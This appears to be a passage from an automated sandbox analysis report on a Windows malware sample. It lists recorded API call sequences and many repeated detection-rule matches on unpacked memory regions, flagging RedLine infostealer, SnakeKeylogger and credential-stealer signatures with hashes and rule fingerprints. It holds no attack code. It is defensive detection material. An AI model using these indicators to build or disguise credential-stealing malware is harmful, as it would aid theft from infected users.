                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D900AF NtdllDialogWndProc_W,2_2_00D900AF
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D90133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,2_2_00D90133
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D9044C NtdllDialogWndProc_W,2_2_00D9044C
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D8E9AF NtdllDialogWndProc_W,CallWindowProcW,2_2_00D8E9AF
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D3AAFC NtdllDialogWndProc_W,2_2_00D3AAFC
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D3AB4F NtdllDialogWndProc_W,2_2_00D3AB4F
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D8ECD4 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_00D8ECD4
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D8EC7C NtdllDialogWndProc_W,2_2_00D8EC7C
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D8EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_00D8EEEB
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D8F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_00D8F1D7
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D3B11F NtdllDialogWndProc_W,745AC8D0,NtdllDialogWndProc_W,2_2_00D3B11F
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D8F2D0 SendMessageW,NtdllDialogWndProc_W,2_2_00D8F2D0
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D3B385 GetParent,NtdllDialogWndProc_W,2_2_00D3B385
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D8F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_00D8F351
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D8F5DA NtdllDialogWndProc_W,2_2_00D8F5DA
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D8F5AB NtdllDialogWndProc_W,2_2_00D8F5AB
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D3B55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,2_2_00D3B55D
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D8F689 ClientToScreen,NtdllDialogWndProc_W,2_2_00D8F689
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8F654 NtdllDialogWndProc_W,2_2_00D8F654
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8F609 NtdllDialogWndProc_W,2_2_00D8F609
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8F7C3 GetWindowLongW,NtdllDialogWndProc_W,2_2_00D8F7C3
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00D8F7FF
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D3B715 NtdllDialogWndProc_W,2_2_00D3B715
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E26685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00E26685
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E1ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74745590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00E1ACC5
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E279D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00E279D3
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D679D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00D679D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: String function: 00D3EC2F appears 68 times
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: String function: 00D46AC0 appears 42 times
Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: String function: 00D4F8A0 appears 35 times
Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: String function: 00E0F8A0 appears 35 times
Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: String function: 00E06AC0 appears 42 times
Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: String function: 00DFEC2F appears 68 times
Source: B7N48hmO78.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.demonetised.exe.3a90000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.demonetised.exe.1290000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
